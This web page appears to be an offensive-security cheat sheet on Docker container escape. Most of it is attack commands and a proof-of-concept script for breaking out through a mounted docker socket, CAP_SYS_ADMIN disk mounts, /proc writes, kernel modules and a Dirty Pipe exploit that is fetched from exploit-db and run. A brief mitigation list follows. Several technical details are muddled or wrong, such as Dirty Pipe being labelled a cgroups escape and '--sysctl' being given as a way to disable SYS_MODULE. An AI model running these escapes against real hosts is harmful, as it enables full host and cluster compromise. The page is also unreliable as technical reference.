Home / Cloud / Container Escape
Critical | ATT&CK T1611

🐳 Docker Container Escape

🧠 Description

Container escape techniques allow attackers to break out of Docker containers and gain access to the underlying host system. This is critical for containerized workloads as it provides full system compromise.

Why Container Escape is Critical:
  • Full host system access from container
  • Access to all containers on the same host
  • Cluster-wide compromise via node access
  • Extract secrets from host filesystem
  • Persistence on infrastructure

πŸ”Œ Docker Socket Escape

The Docker Socket:

# Check if docker socket is mounted
ls -la /var/run/docker.sock

# If mounted, escape to host
docker run -v /:/host alpine chroot /host sh

Alternative Sockets:

# Check for other sockets
find / -name '*.sock' -type s 2>/dev/null

# containerd socket
ls -la /run/containerd/containerd.sock

# crio socket
ls -la /var/run/crio/crio.sock

🏠 Shared Namespace Escape

Host Network Namespace Access:

# Check network namespace
cat /proc/1/net/ipv6route

# Access host network
ip link set myeth0 up
ip addr add 10.0.0.100/24 dev myeth0

# Port scanning from container
nmap -sV 10.0.0.1/24

PID Namespace Escape:

# If PID namespace not isolated
cat /proc/1/cmdline
ps aux

# Write to host process
echo "malicious_code" > /proc/1/root/tmp/payload.sh

πŸ‘‘ CAP_SYS_ADMIN Exploit

Check Capabilities:

# Check current capabilities
cat /proc/self/status | grep Cap
capsh --print

# If CAP_SYS_ADMIN is present, mount host filesystem
mkdir -p /tmp/c
mount /dev/sda1 /tmp/c
chroot /tmp/c

Proof of Concept:

#!/bin/bash
# Container escape via CAP_SYS_ADMIN

# Create device file
mknod /tmp/hostdev c 8 0 2>/dev/null

# Mount host filesystem
mount /dev/sda1 /tmp/hostdir 2>/dev/null

# If successful, chroot to host
if [ -d "/tmp/hostdir/etc" ]; then
    chroot /tmp/hostdir /bin/bash
fi

πŸ“ Privileged Container / Volume Mount

Check if Privileged:

# Check privileged status
cat /proc/self/status | grep SeLinux
dmesg | grep -i security

# Try to mount
mount /dev/sda1 /tmp/escape 2>&1

Host Rootfs Mount:

# If / is mounted as volume
cat /proc/1/mounts | grep -E "^/dev"

# Mount the host root
mkdir -p /tmp/host
mount /dev/sda1 /tmp/host
chroot /tmp/host /bin/bash

Load Kernel Module:

# Check if /sys is writable
ls -la /sys/module

# Write to module params
echo "1" > /sys/module/hidden/parameters/visible

# Or load malicious module (requires key)
insmod /tmp/hidden.ko

βš™οΈ Cgroups Escape (Dirty Pipe)

Dirty Pipe Exploitation:

# Check kernel version
uname -r

# Dirty pipe exploit (CVE-2022-0847)
wget https://exploit-db.com/dirty-pipe.c
gcc dirty-pipe.c -o dirty-pipe
./dirty-pipe /etc/passwd 1

# Now write to any file as root
echo "root:password" | chpasswd

πŸ’₯ Impact

  • Root access on host system
  • Access to all containers on the node
  • Kubernetes secret extraction
  • Node-to-cluster lateral movement
  • Data exfiltration from other workloads

πŸ›‘οΈ Mitigation

βœ… Defense Strategies:
  • Don't run containers as privileged
  • Drop all capabilities: --cap-drop ALL
  • Read-only root filesystem: --read-only
  • DisableSYS_MODULE: --sysctl
  • Use non-root users in containers
  • Regular CVE patching

Secure Container Config:

docker run --read-only \
            --cap-drop ALL \
            --security-opt=no-new-privileges \
            --network=none \
            alpine:latest

πŸ“š References

Back to Cloud Security